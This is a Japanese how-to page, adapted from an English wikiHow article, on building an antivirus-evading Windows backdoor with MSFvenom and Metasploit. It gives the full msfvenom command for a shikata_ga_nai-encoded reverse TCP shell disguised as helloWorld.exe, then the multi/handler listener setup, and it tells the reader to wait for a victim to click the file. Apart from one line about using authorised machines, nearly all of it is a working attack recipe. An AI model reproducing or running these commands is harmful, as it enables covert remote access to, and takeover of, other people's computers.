ほとんど検出されないバックドアを作成する方法

ページ名:ほとんど検出されないバックドアを作成する方法

バックドアは、セキュリティ・メカニズムを迂回するために使用される。msfpayloadとmsfencodeを組み合わせたMSFvenomを使用すると、リバースシェルTCPを使用して攻撃者に接続するバックドアを作成することができます。バックドアを開発するには、マルウェアのシグネチャを変更して、アンチウイルス・ソフトウェアを回避する必要があります。このプロジェクトは、あなたがアクセスする許可を得ている2台のコンピュータ上で完成させ、その過程で、コンピュータのセキュリティとこの種のバックドアがどのように機能するかについて、より深く学んでください。

  • 1
    Kali を起動し、ターミナルコンソールを起動します。
  • 2
    ifconfigと入力してインターフェースを表示し、IPアドレスを確認します。
  • 3
    msfvenom -l encodersと入力して、エンコーダーのリストを表示します。
    • x86/shikata_ga_naiをエンコーダーとして使用します。
  • 4
    msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe > helloWorld.exe と入力する。
    • -a x86 --platform windows 使用するアーキテクチャを指定します。
    • -p windows/shell/reverse_tcp 組み込むペイロードを指定します。
    • LHOSTはリスナーのIPアドレスを指定する。
    • LPORT リスナーのポートを指定します。
    • -b "ⅳx00 "は不正な文字(ヌルバイト)を避けるために指定します。
    • -e x86/shikata_ga_nai エンコーダー名を指定します。
    • -f exe > helloWorld.exe はフォーマット出力を指定します。
  • 5
    msfconsoleと入力してMetasploitを起動する。
    • これでバックドアが生成されました。被害者がhelloWorld.exeをクリックすると、埋め込まれたシェルペイロードが起動し、あなたのシステムに接続します。接続を受け取るためには、Metasploit でマルチハンドラを開き、ペイロードを設定する必要があります。
  • 6
    use exploit/multi/handler とタイプする。
  • 7
    set payload windows/shell/reverse_tcpとタイプする。
  • 8
    モジュールをチェックするためにshow optionsと入力する。
  • 9
    set LHOST 192.168.48.129と入力する。
    • 「LHOST」はリスナーIPアドレスを指定する。
  • 10
    set LPORT 4444 と入力する。
    • 「LPORT」はリスナー・ポートを指定する。
  • 11
    run と入力し、被害者のマシンからの接続を待ちます。
  • 12
    被害者が helloWorld.exe をクリックするのを待ちます。すると、被害者のマシンへの接続に成功する。
  • この記事は、CC BY-NC-SAの下で公開された「 How to Create a Nearly Undetectable Backdoor using MSFvenom in Kali Linux」を改変して作成しました。特に断りのない限り、CC BY-NC-SAの下で利用可能です。

    シェアボタン: このページをSNSに投稿するのに便利です。

    コメント

    返信元返信をやめる

    ※ 悪質なユーザーの書き込みは制限します。

    最新を表示する

    NG表示方式

    NGID一覧